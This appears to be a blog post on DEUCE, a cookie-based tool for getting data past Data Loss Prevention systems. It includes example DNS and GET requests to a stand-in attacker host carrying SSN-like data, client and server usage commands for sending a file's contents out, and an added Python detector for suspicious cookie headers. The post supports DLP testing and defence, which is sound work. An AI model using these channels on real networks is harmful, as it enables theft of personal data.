At a recent BSides event there was a talk about data exfiltration and Data Loss Prevention (DLP) systems. A known vector for bypassing DLP is the use of NSLookup: the attacker requests a domain he controls, but prefixes it with a hostname that contains the data to be sent out of the controlled environment. If an attacker wanted to steal a name and social security number, he would request “johndoe123-45-1234.attacker.com”. That request hits the attacker's DNS server and is logged there, building a list of identities for the attacker to mine later. This kind of attack is limited to a maximum of 255 characters per request. The concept got me thinking: what about a standard GET request such as http://attacker.com/johndoe123-45-1234? That would make life easier for the attacker, who would no longer need to control a DNS server; he would only need to see which pages were requested. We would still be bound by the character maximum, and each request could easily be logged and analyzed by proxies or alerting systems. Let's be honest: most DLP systems are going to alert on these types of requests, or at least they should.
After some dialog with friends, it was pointed out that cookies would be a great alternative. Cookies aren't normally logged by proxies or other systems, and since cookies are normally encoded or encrypted anyway, an encoded or encrypted cookie would keep DLP and prying eyes at bay. As an added benefit, we are no longer limited by the 255 character maximum, and one request can carry many cookies.
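As an added example that is not part of DEUCE or the original post, the following Python checks Cookie headers from a proxy that does log request headers (which, as noted above, many do not) for the traces a cookie-based channel leaves behind: an oversized or unusually numerous set of cookies, long high-entropy values, and base64 values that decode to SSN-shaped text. The sample headers, the SHA-512 digest standing in for AES ciphertext and the thresholds are all constructed for illustration.

```python
import base64
import hashlib
import math
import re
from collections import Counter

SSN_PATTERN = re.compile(r"\d{3}-\d{2}-\d{4}")

# Constructed Cookie headers as a proxy that logs request headers would record them;
# the SHA-512 digest stands in for AES ciphertext (no real encryption is done here).
_BLOB = base64.b64encode(hashlib.sha512(b"stand-in for AES ciphertext").digest() * 2).decode()
SAMPLE_COOKIE_HEADERS = {
    "benign": "sessionid=a3f9c2e1b7d4; theme=dark; lang=en-US",
    "encoded_pii": "track=" + base64.b64encode(b"johndoe123-45-1234").decode(),
    "encrypted_chunks": "; ".join(f"c{i}={_BLOB}" for i in range(12)),
}

def shannon_entropy(text):
    """Bits per character; base64 text tops out at log2(64) = 6."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0

def parse_cookie_header(header):
    """Split a Cookie header into (name, value) pairs, keeping any '=' inside values."""
    parts = (p.strip().partition("=") for p in header.split(";"))
    return [(name, value) for name, _, value in parts if name]

def decoded_text(value):
    """ASCII text a strict base64 value decodes to, or None if it is not such a value."""
    try:
        return base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def score_cookie_header(header, max_total=1024, max_cookies=8, min_len=32, min_bits=4.5):
    """Return the reasons a Cookie header looks like an exfiltration carrier ([] if none)."""
    pairs = parse_cookie_header(header)
    reasons = []
    total = sum(len(v) for _, v in pairs)
    if total > max_total:
        reasons.append(f"cookie payload is {total} bytes (limit {max_total})")
    if len(pairs) > max_cookies:
        reasons.append(f"{len(pairs)} cookies in one request (limit {max_cookies})")
    for name, value in pairs:
        if len(value) >= min_len and shannon_entropy(value) >= min_bits:
            reasons.append(f"cookie {name} carries a {len(value)}-char high-entropy value")
        text = decoded_text(value)
        if text is not None and text.isprintable() and SSN_PATTERN.search(text):
            reasons.append(f"cookie {name} base64-decodes to text containing an SSN-shaped string")
    return reasons
```

The thresholds need tuning against a baseline of the environment's own cookie traffic, since large legitimate cookies such as signed tokens will otherwise show up as high-entropy values.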
DEUCE is written in Python but could easily be converted to an executable with py2exe or PyInstaller. The AES encryption relies on PyCrypto. Because this is just a proof-of-concept tool, DEUCE does not currently support SSL, but it may in the future.
Using DEUCE is simple. By default the server listens on all interfaces on port 80. The DEUCE client has more options, such as the encryption and encoding methods, the target URL and the input file. Example usage:
- python deuce_server.py -o output.txt
  - Starts the listening server on all interfaces on port 80, writing the received data to output.txt
- python deuce_client.py -u http://location_of_deuce_server -i inputfile.txt -m
  - Starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server; -m tells DEUCE to use multi-encode mode
Please feel free to test this concept in your environment;
obviously I do not have access to every possible solution out there. It is
important to note I am in no way responsible for how you use DEUCE. This tool
is designed to help penetration testers and assist users in testing their DLP
implementation. You are not permitted to use DEUCE for any illegal means.
Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake
Garlie (@_Jagar_) for listening to me
rant about this.